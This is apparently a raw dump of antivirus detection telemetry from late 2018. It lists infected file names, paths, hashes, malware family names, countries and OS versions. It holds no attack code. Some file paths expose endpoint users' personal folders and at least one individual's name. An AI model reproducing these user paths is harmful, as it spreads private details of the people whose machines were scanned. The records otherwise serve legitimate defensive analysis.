  Row(detection=Row(filename='61e0844a47e4d1b0bf138fd02f1b389c2720f77b60f27ca4f87ae9e658ad6459', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\61E0844A47E4D1B0BF138FD02F1B389C2720F77B60F27CA4F87AE9E658AD6459', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='61e0844a47e4d1b0bf138fd02f1b389c2720f77b60f27ca4f87ae9e658ad6459', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:25:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mc01010.exe', filepath='C:\\NOVA PASTA\\MCPED10\\BK\\MC01010.EXE', filesize=6080000, name='W32/Sality.AT.#M1.#R1'), hash='9272f64ba6d3ff5aa5199363b1b185f1929a2ec4b45a4762d944964806089fad', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:35:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080848-f1c2e20d', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-080816-EAE71227\\AVSCAN-20181101-080848-F1C2E20D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:09:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.lvmpr.#M0.#R0'), hash='b3905883dd74ad5d2e92d9824b8110b0d06a0cf0fd18a36f8bf82ffa0a954a6e', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:29:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maphwdygbinotm.bat', filepath='C:\\maphwdygbinotm.bat', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='848be2e580d686e7b798be4557a8985e1dccaf61', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\848be2e580d686e7b798be4557a8985e1dccaf61', filesize=1408000, name='W32/Infector.Gen8.#M300.#R700734'), hash='af25ae9a1e8ddf6ef1ea56a350a03534969254016f31f4aeabc5859a9ace825d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:58:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='busta paga.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\CORSO CARVICO\\BUSTA PAGA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0112051.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0112051.exe', filesize=192000, name='W32/Viking.AT.#M1.#R1'), hash='e018890c01134389ad718d1060fab0af08bd9d10b374fb7b6e66b4b2e9d0fb35', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:31:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='run-chess_bot_licensed_080.exe', filepath='c:\\users\\X\\documents\\chessbot v0.80\\run-chess_bot_licensed_080.exe', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='8c93d30360cf904d1d080c069a0de255e9ef173016b5c6dacd070e7fc6d4ac9a', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T15:12:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='efcb5c54ebd819875b4cc9538c681302fe9e2c4ab361417e3160f68189815ab2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\EFCB5C54EBD819875B4CC9538C681302FE9E2C4AB361417E3160F68189815AB2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='efcb5c54ebd819875b4cc9538c681302fe9e2c4ab361417e3160f68189815ab2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:14:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00007171', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2136\\tmp000045e5\\tmp00007171', filesize=2048000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='ea863c5640711f4b72f7f86cca57200b7a707cffcf202657e4f32ecac728852f', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-01T09:46:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uepdorimdg.exe', filepath='C:\\Users\\user2\\AppData\\Local\\Temp\\mylbotmslqts\\uepdorimdg.exe', filesize=0, name='TR/Taranis.2886.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T03:47:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jayspov.e10.kacey.xxx.720p.wmv-ktr.rar', filepath="Z:\\Download\\newshostings\\2018-11-01\\Automatische Vorschau von ... ov.E10.Kacey.XXX.720p.WMV-KTR'\\.tmp\\JaysPov.E10.Kacey.XXX.720p.WMV-KTR.rar", filesize=11232000, name='TR/Injector.SF.#M1.#R1'), hash='d90a43c07f6c4a567c0afe6542570c8badf9543b5263222fe0b71470515c57bc', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=349696, timestamp='2018-11-01T18:36:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='operatore tatuaggi e piercing.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SERVIZI ALLA PERSONA\\OPERATORE TATUAGGI E PIERCING.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='imbianchino.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\EDILIZIA\\EDILIZIA\\IMBIANCHINO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:12:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='castelli chiara.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\CASTELLI CHIARA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T12:22:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161953-457b1760', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2804ac6e\\AVSCAN-20181101-161343-1855E7FE\\AVSCAN-20181101-161953-457B1760', filesize=428000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='c84998229679dc65320b08c7fba5ac11320fe678a9d128b954feb1e0381df890', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:49:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120854-0532db2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57e73b18\\AVSCAN-20181101-120805-FE3FD36B\\AVSCAN-20181101-120854-0532DB2E', filesize=768000, name='TR/Dldr.Zampol.d40f64.#M1.#R1'), hash='d40f64b351bfbdb11ac5e13165810e670b7fdf3dfc27a46bfe02458be4542439', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:08:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190523-f3a10aa3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190523-F3A10AA3', filesize=64000, name='TR/Agent.gpono.#M1.#R1'), hash='a226c44141c53061f71957bc34dbfface47bd10230578a172e45e5b267b295b6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152305-95c9c643', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152305-95C9C643', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:23:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='allegati pag. 187 a pag. 271.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\SICUREZZA NEI LUOGHI DI LAVORO\\L.812008\\Allegati pag. 187 a pag. 271.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\NET.Remote Assistance\\MsiExEc64.ExE', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESET\\ESET Security\\ekrn.exe', parentsize=2302152, timestamp='2018-11-04T16:25:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225305-fe76deab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-202554-C98B3607\\AVSCAN-20181104-225305-FE76DEAB', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:53:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131901-3a720fc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131901-3A720FC8', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-07-04-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T01:14:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161712-d072bfc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161712-D072BFC1', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:17:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190824-30976a48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-190800-2C1ABDA4\\AVSCAN-20181104-190824-30976A48', filesize=5952000, name='HEUR/AGEN.1015658.#M1.#R1'), hash='6f59c94a106529163adc6375303d689d70c6c0b312d0d536cd85811fcdf1dd14', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:38:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200035-b3847b84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60307d59\\AVSCAN-20181104-195731-99D479CF\\AVSCAN-20181104-200035-B3847B84', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:00:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:25:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~ppc44d.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~ppC44D.tmp', filesize=128000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='3dfb3bcd7618c2bc34a4b30c7062e1d0204afe188d4c326613667d5c1ce30a25', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:39:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winzip20-wz.exe', filepath='C:\\Users\\X\\Downloads\\winzip20-wz.exe', filesize=1544000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='75f16ca3b9fbba7e9d285763687617436a03374d28780809f5e5a198eaa77830', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T20:48:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200047-b5280e55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60307d59\\AVSCAN-20181104-195731-99D479CF\\AVSCAN-20181104-200047-B5280E55', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:00:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='449bb00b4cfac82b665cb2352cacf6166a7652303fa7e83dbb6d1183c34a3280', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=455680, timestamp='2018-11-04T10:50:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123131-92a30384', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_44c283da\\AVSCAN-20181104-122944-88118838\\AVSCAN-20181104-123131-92A30384', filesize=80000, name='TR/Ghokswa.bbago.#M1.#R1'), hash='608157045d1092d1192901f7476b7aaabdd1237ef69ac4539c0ed85b7a374921', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:43:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b30fc1da44f97eef2d06c983b312bb6d308fe531', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\b30fc1da44f97eef2d06c983b312bb6d308fe531', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='8cc70b959feaba7fd476ea357e2da573e4e43c6eca7e5712210717e30d742ccf', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:44:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152740-73c53f96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-152740-73C53F96', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:27:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:01:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-10-30-56.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-31T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T09:40:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:40:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173808-685bcc4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173808-685BCC4B', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:38:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-182130-3f940053', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea5ca657\\AVSCAN-20181104-182059-3C92F874\\AVSCAN-20181104-182130-3F940053', filesize=100000, name='HTML/ExpKit.Gen3.#M1.#R1'), hash='566a1432c898dd9738dae32412a098b8f83964d4bebe6030034635ed3bb5393a', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:21:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225736-e218bde3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-225736-E218BDE3', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:57:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:47:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rme.exe', filepath='\\?\\C:\\Users\\X\\Documents\\Visual Studio 2013\\Projects\\Rme\\Rme\\bin\\Debug\\Rme.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4380'), hash='bf3342bc48196dfb7e8efd2f35987ddfbee2e77bdd36a77e75c72fc4d14ef6ce', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:42:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cnab4mnu.exe', filepath='\\\\?\\D:\\program\\2016\\2900\\English\\CNAB4MNU.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='a5ef8ff89ee33a80c326ff4fb0911ab60e5e34c592f95f91354addeaef20fef8', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:52:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:28:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205241-5444b219', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e3305e6\\AVSCAN-20181104-205010-3E708EA3\\AVSCAN-20181104-205241-5444B219', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='467169df66f73856c5e0ed2b0ef14608033c71496b3e36be1cccdc0f874c5c08', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:52:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='4081712d023528361d2755bd80778a024bdfb283', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\4081712d023528361d2755bd80778a024bdfb283', filesize=320000, name='Adware/DealPly.9dbdc0.#M1.#R1'), hash='9dbdc03ed0008c55aeb96db36827238108e796b83eeb14bc81aced95a36e1e2b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:41:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mfl_vc9.dll', filepath='C:\\Program Files (x86)\\MAGIX\\Audio Cleaning Lab 2016\\VideoExportMaker\\MFL_VC9.dll', filesize=772000, name='W32/Ramnit.C.#M1.#R1'), hash='8699632edbbbe3aa5850325e8192e7597af1ec7d087dde65a7eb592dc508444f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-04T08:24:13Z'), dt=datetime.date(2018, 11, 4)),
